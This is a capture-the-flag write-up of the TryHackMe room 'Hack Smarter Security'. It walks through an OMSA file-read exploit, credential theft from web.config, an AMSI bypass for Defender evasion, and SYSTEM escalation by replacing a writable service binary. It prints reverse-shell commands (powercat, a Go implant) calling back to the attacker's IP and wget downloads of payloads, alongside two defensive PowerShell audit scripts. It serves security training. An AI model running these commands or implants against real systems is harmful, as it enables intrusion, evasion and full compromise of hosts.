Hack Smarter Security

Can you hack the hackers?


Last updated 1 year ago

This work by Manav G Krishna is licensed under CC BY-NC 4.0.

Machine IP: 10.10.112.96

Nmap Scan:

nmap -p- -A -v --min-rate 100 -oN hacksmartersecurity_thm -Pn 10.10.112.96

Nmap scan report for 10.10.112.96
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23  02:58PM                 3722 Credit-Cards-We-Pwned.txt
|_06-28-23  03:00PM              1022126 stolen-passport.png
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
|   256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_  256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: HackSmarterSec
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open  ssl/rxmon?
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Issuer: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-30T19:03:17
| Not valid after:  2025-06-29T19:03:17
| MD5:   4276:b53d:a8ab:fa7c:10c0:1535:ff41:2928
|_SHA-1: c44f:51f8:ed54:802f:bb94:d0ea:705d:50f8:fd96:f49f
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Sat, 16 Mar 2024 06:17:01 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|     <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Sat, 16 Mar 2024 06:17:07 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|_    <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HACKSMARTERSEC
|   NetBIOS_Domain_Name: HACKSMARTERSEC
|   NetBIOS_Computer_Name: HACKSMARTERSEC
|   DNS_Domain_Name: hacksmartersec
|   DNS_Computer_Name: hacksmartersec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-03-16T06:17:37+00:00
|_ssl-date: 2024-03-16T06:17:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=hacksmartersec
| Issuer: commonName=hacksmartersec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-15T06:03:53
| Not valid after:  2024-09-14T06:03:53
| MD5:   8383:3da2:bc78:7d18:98f9:aaf9:d5b0:c626
|_SHA-1: 2012:fcc6:d0ef:d9db:67f0:e3c9:8554:6dfa:26c0:68dd
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   153.05 ms 10.11.0.1
2   153.20 ms 10.10.112.96

From the scan we straight away notice that anonymous FTP login is allowed, and the directory listing is already visible in the scan output.

Connecting to the FTP server:

Command:

ftp 10.10.112.96

We can connect with the name anonymous; the password can be left empty or set to anonymous as well.

Downloading the files from the server:

We notice that stolen-passport.png didn't get transferred correctly. This is because image files are stored in binary format: ASCII mode is the default for the majority of FTP servers, and to transfer image files without corruption we have to switch to Binary mode.

Switching to Binary mode with the binary command:

Now the .png file has downloaded successfully. Checking out the files:

The first file - Credit-Cards-We-Pwned.txt has some credit card information:

There are more lines in that file in a similar fashion.

The second file - stolen-passport.png:

We can run exiftool to see if we get some metadata from the image:

Command:

exiftool stolen-passport.png

No good information in here.

Checking out port 80:

We can see what Wappalyzer tells us:

We now know that the web server running is IIS. We have a contact form here:

Testing out a basic XSS Payload:

Now let's set up a netcat listener on port 80. If the above payload works we should get a connection back on our listener, which shows that the server has reached out to our machine. The IP specified in the payload is the tun0 interface IP.

But unfortunately we don't get any connection on the listener.

We can now do some directory busting to see if we get any juicy paths:

Command:

feroxbuster -u http://10.10.112.96

Nothing interesting here either.

Checking out port 1311: SpeedGuide tells us that this port is used by Dell OpenManage HTTPS.

Upon googling "port 1311 vulnerability", we come across this result from Tenable:

Let's keep this aside for now and check out the website:

The certificate didn't have anything much in it.

We are presented with a Dell OpenManage Server Administrator (OMSA) login page. Dell EMC OpenManage Enterprise is a unified systems management console designed to take complexity out of the IT administration experience.

Note: Accessing the port over plain HTTP gave us this: "Bad Request - This combination of host and port requires TLS". This confirms that we had to access it via HTTPS, which is what we had done.

The details in the Tenable research blog match what we see on the login page; we have the exact dialog boxes mentioned in the blog. It is a CVE, and the description says: "An unauthenticated remote attacker can login to OMSA as admin without knowing a correct OS username and password on that system". This indeed sounds juicy, so let's give it a try.

Following the POC:

But this didn't work as expected, as it gave us a "Login failed" error:

Moving on. We notice there is an About section. Let us check it out:

And now we have the version: 9.4.0.2

Note: The About page does take some time to load, so just wait it out.

Now let us use this version to find exploits:

Upon googling "dellemc 9.4.0.2 exploits", we get this result from Rhino Security Labs:

It is a file read vulnerability in Dell OpenManage Server Administrator (OMSA).

The blog explains the vulnerability really well and there is also a POC in there:

Usage:

Command:

python3 exploit.py 10.11.75.84 10.10.112.96:1311

We know from before that the web server running is IIS, and from the Nmap scan we can see ports 22 (SSH) and 3389 (RDP) open. Keeping all this in mind, the main file that we could try to read is the web.config file. It is an XML file containing rules for a particular site (or directory) on a web server.

This file is located within C:\inetpub\wwwroot, which is the default root directory for websites hosted on IIS.

In our case the name of the website hosted on the IIS web server is hacksmartersec. We can see this in the Nmap scan under the port 1311 information (commonName=hacksmartersec).

The exact location: C:\inetpub\wwwroot\hacksmartersec\web.config

Let us read this file now:

We can see that we have a password for the username - tyler
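The web.config exposure is worth checking from the defensive side as well. The following PowerShell audit is an added example written for this writeup, not the author's or any project's code: it walks every IIS site, parses its web.config and reports plaintext secrets in connectionStrings and appSettings. It assumes the WebAdministration module is available (IIS installed) and that secrets sit in those two sections, which is the usual but not the only place.

```powershell
# Added example, not from the writeup: find IIS sites whose web.config carries
# plaintext secrets, the exposure that the OMSA file read turned into a login.
# Assumes IIS with the WebAdministration module and that secrets live in
# <connectionStrings> or <appSettings> (an assumption; adjust for your apps).
Import-Module WebAdministration

function Get-WebConfigSecret {
    param([Parameter(Mandatory)][string]$ConfigPath)
    $findings = @()
    [xml]$cfg = Get-Content -LiteralPath $ConfigPath -Raw

    # connectionStrings: flag any entry carrying password=/pwd= unless the whole
    # section has been encrypted (aspnet_regiis -pef sets configProtectionProvider).
    $cs = $cfg.configuration.connectionStrings
    if ($cs -and -not $cs.configProtectionProvider) {
        foreach ($add in $cs.add) {
            if ($add.connectionString -match '(?i)\b(password|pwd)\s*=') {
                $findings += [pscustomobject]@{
                    File = $ConfigPath; Section = 'connectionStrings'
                    Name = $add.name;  Issue = 'plaintext password in connection string'
                }
            }
        }
    }

    # appSettings: flag keys whose name suggests a credential and whose value is set.
    $as = $cfg.configuration.appSettings
    if ($as -and -not $as.configProtectionProvider) {
        foreach ($add in $as.add) {
            if ($add.key -match '(?i)pass|pwd|secret|token|apikey' -and $add.value) {
                $findings += [pscustomobject]@{
                    File = $ConfigPath; Section = 'appSettings'
                    Name = $add.key;   Issue = 'credential-like key with plaintext value'
                }
            }
        }
    }
    return $findings
}

function Find-IisPlaintextSecret {
    # physicalPath is often stored as %SystemDrive%\inetpub\wwwroot, so expand it first.
    foreach ($site in Get-Website) {
        $root = [Environment]::ExpandEnvironmentVariables($site.physicalPath)
        $cfgFile = Join-Path $root 'web.config'
        if (Test-Path -LiteralPath $cfgFile) { Get-WebConfigSecret -ConfigPath $cfgFile }
    }
}

Find-IisPlaintextSecret | Format-Table -AutoSize
```

Anything it reports is a candidate for section encryption with aspnet_regiis -pef, or for moving the credential out of the file entirely.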

We can now SSH in as this user:

Command:

ssh tyler@10.10.112.96

We can find the user flag in the Desktop folder of tyler.

Checking if we are part of any interesting groups or if we have any juicy privileges:

Command:

whoami /all

There is nothing of interest.

Checking if Defender is active:

Command:

sc query WinDefend

And yes, we can see that the STATE is RUNNING.

We can still try to execute scripts like winPEAS.ps1, PrivescCheck.ps1 etc. to find vulnerabilities, if any:

Also, tyler has Full Control (F) on the Desktop folder:

Command:

icacls .

Full Control (F) refers to the highest level of permissions that can be granted to a user or group in a Windows security context. When a user or group is assigned Full Control permissions, they have complete control over the object to which the permissions apply.

So we can put our scripts in the Desktop folder.

Executing winPEAS.ps1:

When trying to run the script after sending it via wget (after setting up a python server on port 4545 with python3 -m http.server 4545), Defender flagged it as a virus. Any port can be used to serve the file.

Command:

wget http://10.11.75.84:4545/winpeas.ps1 -o winpeas.ps1

We can now try to do an AMSI Bypass. For more information check this out:

The script now starts running without any issues.

Note: Running WinPEAS was taking so much time and it wasn't giving me any good information. I then decided to switch to PrivescCheck. Also the .exe of WinPEAS and a few other scripts that I tested were getting flagged even after running the command that could bypass AMSI. I have shown only the ones that worked for me in this writeup.

Executing PrivescCheck.ps1:

When trying to run it, it ran without any issues. It wasn't getting flagged by Defender. This is actually one of the few scripts that usually don't get flagged. This time I set up a python server on port 4646.

Command:

wget http://10.11.75.84:4646/PrivescCheck.ps1 -o PrivescCheck.ps1

Command:

. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,CSV,HTML,XML

Now we just wait for it to find something worthy that could help us in rooting the machine.

It has found a vulnerability rated High that lets us escalate privileges, as this service is running under the SYSTEM account and we can start and stop the service:

Name              : spoofer-scheduler
ImagePath         : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
User              : LocalSystem
ModifiablePath    : C:\Program Files (x86)\Spoofer
IdentityReference : BUILTIN\Users
Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes,
                    DeleteChild, Traverse
Status            : Running
UserCanStart      : True
UserCanStop       : True

Explanation:

Name: Indicates the name of the service or process, which in this case is spoofer-scheduler.

ImagePath: Specifies the path to the executable file (spoofer-scheduler.exe) associated with the service. It's located in the directory C:\Program Files (x86)\Spoofer.

User: Indicates the user account under which the service is running. In this case, it's running under the LocalSystem account, which is a built-in Windows account with high privileges.

ModifiablePath: Specifies the path where the service's files and configurations are stored. In this case, it's located in the directory C:\Program Files (x86)\Spoofer.

IdentityReference: Specifies the security principal or group that has permissions to access or manage the service. In this case, it's the Users group (BUILTIN\Users).

Permissions: Lists the specific permissions granted to the Users group for this service. These permissions include WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes, DeleteChild, and Traverse.

Status: Indicates the current status of the service. In this case, it's Running, meaning the service is currently running.

UserCanStart: Specifies whether users have permission to start the service. It's set to True, indicating that users can start the service.

UserCanStop: Specifies whether users have permission to stop the service. It's also set to True, indicating that users can stop the service.
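The finding above is easy to reproduce and monitor for without a full enumeration suite. The following PowerShell audit is an added example written for this writeup, not PrivescCheck's or the author's code: it lists services running as LocalSystem whose binary directory grants write-type rights (create, delete, change permissions, take ownership) to low-privileged principals. On this machine it should report spoofer-scheduler with BUILTIN\Users holding Full Control. The principal list and the set of rights treated as "write" are my assumptions; start/stop rights on the service DACL are a separate check that the block does not cover.

```powershell
# Added example, not from the writeup: audit services running as LocalSystem whose
# image directory is writable by low-privileged principals, the condition that
# PrivescCheck reported for spoofer-scheduler. Run as an administrator.

# Principals whose write access to a service binary's folder is a finding (assumed list).
$LowPrivPrincipals = @(
    'BUILTIN\Users', 'Everyone',
    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
)

# Any of these lets a member replace the binary or rewrite the ACL itself.
# WriteData/AppendData are the CreateFiles/CreateDirectories rights on a folder.
$WriteRights = [System.Security.AccessControl.FileSystemRights](
    'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ' +
    'ChangePermissions, TakeOwnership')

function Get-ServiceImageDirectory {
    param([string]$PathName)
    # PathName may be quoted and may carry arguments:
    #   "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" -arg
    if ($PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
    else { $exe = ($PathName -split '\s+')[0] }
    return Split-Path -Parent $exe
}

function Find-WritableServiceDirectory {
    $results = @()
    $services = Get-CimInstance Win32_Service | Where-Object {
        $_.StartName -in @('LocalSystem', 'NT AUTHORITY\SYSTEM') -and $_.PathName
    }
    foreach ($svc in $services) {
        $dir = Get-ServiceImageDirectory -PathName $svc.PathName
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        $acl = Get-Acl -LiteralPath $dir
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.IdentityReference.Value -notin $LowPrivPrincipals) { continue }
            if (($ace.FileSystemRights -band $WriteRights) -eq 0) { continue }
            $results += [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                State     = $svc.State
                Directory = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
    return $results
}

# Remediation for a hit is to strip the write ACE and leave read/execute, e.g.:
#   icacls "C:\Program Files (x86)\Spoofer" /remove:g "BUILTIN\Users"
#   icacls "C:\Program Files (x86)\Spoofer" /grant "BUILTIN\Users":(OI)(CI)RX
Find-WritableServiceDirectory | Format-Table -AutoSize
```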

Privilege Escalation to SYSTEM:

Firstly let us get into the folder where the spoofer-scheduler.exe is located:

From the PrivEscCheck output we know that the service - spoofer-scheduler is currently running.

Thinking Process:

Since we know the service is running under the SYSTEM account and that we have write permissions on the folder where spoofer-scheduler.exe is located (based on the PrivescCheck output), we can remove that binary and replace it with our reverse shell binary of the same name. Since the service is currently running, we have to stop it first in order to remove the file; once the file is replaced and the service is started again, we should get a shell as SYSTEM.

Confirming that we can write into the folder:

Command:

icacls .

If we recollect, the user we have a hold on, tyler, is part of the BUILTIN\Users group. Members of this group have Full Control (F) on the Spoofer folder where the binary is located, and users in this group can also manage the service.

Stopping the spoofer-scheduler service:

Command:

Stop-Service -Name "spoofer-scheduler"

Confirming the same:

Command:

Get-Service -Name "spoofer-scheduler"

We can see that the Status is Stopped.

Now we can remove the original spoofer-scheduler.exe:

Command:

rm spoofer-scheduler.exe

Now we can make use of a tool called powercat for the shell:

Command:

powercat -c 10.11.75.84 -p 4444 -e cmd -g > test.ps1

This basically creates a reverse shell.

This PowerShell script has to be converted to .exe format. To do this we will use this online tool:

Now we send the spoofer-scheduler.exe containing the shell to the machine. The python server being used to serve the file is the one on port 4545 itself:

Command:

wget http://10.11.75.84:4545/spoofer-scheduler.exe -o spoofer-scheduler.exe

Setting up a netcat listener on port 4444:

Command:

nc -lnvp 4444

Starting the spoofer-scheduler service:

Command:

Start-Service -Name "spoofer-scheduler"

Let us go back and check our listener:

We have successfully got a shell as SYSTEM. The shell dies pretty soon, though.

The last answer we can find in this path:

C:\Users\Administrator\Desktop\Hacking-Targets\hacking-targets.txt

Note:

Now I will be showing another script or method that I used to bypass Defender to get a SYSTEM shell which doesn't die.

Go Script to Bypass Defender:

We have to firstly clone the repo:

Command:

git clone https://github.com/daniellowrie/update_script

Once that is done, we can start to get it working:

Command:

go run SecUp.go 10.11.75.84

This starts the main engine: it generates the payload (the implant) along with a few other files it needs to function as intended, and it also sets up an HTTP server to serve the needed files:

Out of the attack files it generates, update_script.go is the payload file. It also sets the listening port to 443 by default, which helps in evading any detections in place most of the time.

So we set up a netcat listener on port 443:

Command:

nc -lnvp 443

Compiling the .go file to an .exe file:

Command:

GOOS=windows go build update_script.go

This generates a file named - update_script.exe:

Now we have to change the file name from update_script.exe to spoofer-scheduler.exe as that was the binary in question based on the PrivEscCheck output:

This file must now be served or sent to the machine. This time I set up a python server on port 4848. Before we send the file, the spoofer-scheduler service must be stopped; it is already stopped at the moment (apparently, since starting it triggered the shell previously, the service went back to the STOPPED state after the shell died). Since a spoofer-scheduler.exe is already present on the machine from the powercat step, it must be removed and replaced with the new one.

Command:

wget http://10.11.75.84:4848/spoofer-scheduler.exe -o spoofer-scheduler.exe

Starting the spoofer-scheduler service: Let us now start the service. For starting the service in PowerShell check the command mentioned in the Privilege Escalation section.

We can also start it in cmd like this:

Command:

sc start spoofer-scheduler

The moment we start it, we can see the files the Go script needs being served from the HTTP server that the script set up initially:

Checking out our listener:

Yet again we have a SYSTEM shell. This shell doesn't die like the powercat shell did. The Nim shell that I mention below also died soon.

Another way to root this machine is by using a reverse shell written in Nim that goes undetected by Defender, like how powercat and the Go-script-generated payload went through without getting removed. Tyler himself has made a video on this; do check that out:

Room solved!!

CC BY-NC 4.0
Links referenced in this writeup:
  • TryHackMe room: Hack Smarter Security
  • Rhino Security Labs CVE PoC: https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2020-5377_CVE-2021-21514
  • WinPEAS (PowerShell): https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASps1
  • SpeedGuide: Port 1311 (tcp/udp)
  • Tenable: Dell EMC OpenManage Server Administrator Authentication Bypass (CVE-2021-21513)
  • Rhino Security Labs: CVE-2020-5377: Dell OpenManage Server Administrator File Read
  • PrivescCheck: GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows
  • Hacking Articles: A Detailed Guide on AMSI Bypass
  • powercat: GitHub - besimorhino/powercat: netshell features all in version 2 powershell
  • PowerShell to EXE converter
  • update_script: GitHub - daniellowrie/update_script: Fileless "malware" that bypasses Windows Defender using PowerShell and obfuscation
  • Author profile: TryHackMe | gravereaper2038